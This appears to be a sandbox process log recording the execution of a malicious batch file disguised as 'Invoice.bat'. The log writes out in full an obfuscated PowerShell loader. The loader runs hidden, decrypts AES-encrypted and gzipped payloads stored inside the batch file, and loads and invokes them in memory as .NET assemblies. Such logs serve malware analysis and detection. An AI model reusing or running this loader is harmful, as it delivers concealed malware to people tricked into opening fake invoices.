cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "qGcVX" C:\Users\test22\AppData\Local\Temp\Invoice.bat
2568cmd.exe cmd /c "set __=^&rem"
2728cmd.exe cmd /c "set __=^&rem"
2892cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Local\Temp\Invoice.bat';$LBXv='EnxZkZtrxZkZyxZkZPxZkZoxZkZixZkZntxZkZ'.Replace('xZkZ', ''),'LfkJboafkJbdfkJb'.Replace('fkJb', ''),'TraZzCfnZzCfsZzCfforZzCfmFZzCfinZzCfalZzCfBZzCflZzCfoZzCfckZzCf'.Replace('ZzCf', ''),'SpyZniliyZnityZni'.Replace('yZni', ''),'MGnZKainGnZKMoGnZKduGnZKleGnZK'.Replace('GnZK', ''),'InbHdXvbHdXobHdXkebHdX'.Replace('bHdX', ''),'FroCdfHmCdfHBaCdfHseCdfH64CdfHStrCdfHiCdfHngCdfH'.Replace('CdfH', ''),'ElcZhAemcZhAecZhAntcZhAAcZhAtcZhA'.Replace('cZhA', ''),'GetlitjCulitjrrlitjenlitjtPrlitjoclitjesslitj'.Replace('litj', ''),'DeLCVEcLCVEomLCVEpLCVEreLCVEsLCVEsLCVE'.Replace('LCVE', ''),'ChoUHdanoUHdgeoUHdExoUHdteoUHdnoUHdsiooUHdnoUHd'.Replace('oUHd', ''),'RexzFyadLxzFyinxzFyesxzFy'.Replace('xzFy', ''),'CrmXrOeamXrOtmXrOemXrODemXrOcrmXrOyptmXrOormXrO'.Replace('mXrO', ''),'CopWSMpypWSMTopWSM'.Replace('pWSM', '');powershell -w hidden;function QTKLr($tViOh){$SNEnq=[System.Security.Cryptography.Aes]::Create();$SNEnq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$SNEnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$SNEnq.Key=[System.Convert]::($LBXv[6])('0rrdcYXb860VlZnKW5QGgLu/A8DnnAjVPJTLbw2qo+g=');$SNEnq.IV=[System.Convert]::($LBXv[6])('/T2oLRR5WtwrCpmlYMfgng==');$BTPsM=$SNEnq.($LBXv[12])();$TtlHr=$BTPsM.($LBXv[2])($tViOh,0,$tViOh.Length);$BTPsM.Dispose();$SNEnq.Dispose();$TtlHr;}function xtuvS($tViOh){$bpHvy=New-Object System.IO.MemoryStream(,$tViOh);$diMdz=New-Object System.IO.MemoryStream;$GCHVr=New-Object System.IO.Compression.GZipStream($bpHvy,[IO.Compression.CompressionMode]::($LBXv[9]));$GCHVr.($LBXv[13])($diMdz);$GCHVr.Dispose();$bpHvy.Dispose();$diMdz.Dispose();$diMdz.ToArray();}$shVBs=[System.IO.File]::($LBXv[11])([Console]::Title);$hBReo=xtuvS (QTKLr ([Convert]::($LBXv[6])([System.Linq.Enumerable]::($LBXv[7])($shVBs, 5).Substring(2))));$eZAuP=xtuvS (QTKLr ([Convert]::($LBXv[6])([System.Linq.Enumerable]::($LBXv[7])($shVBs, 6).Substring(2))));[System.Reflection.Assembly]::($LBXv[1])([byte[]]$eZAuP).($LBXv[0]).($LBXv[5])($null,$null);[System.Reflection.Assembly]::($LBXv[1])([byte[]]$hBReo).($LBXv[0]).($LBXv[5])($null,$null); "
2944powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2984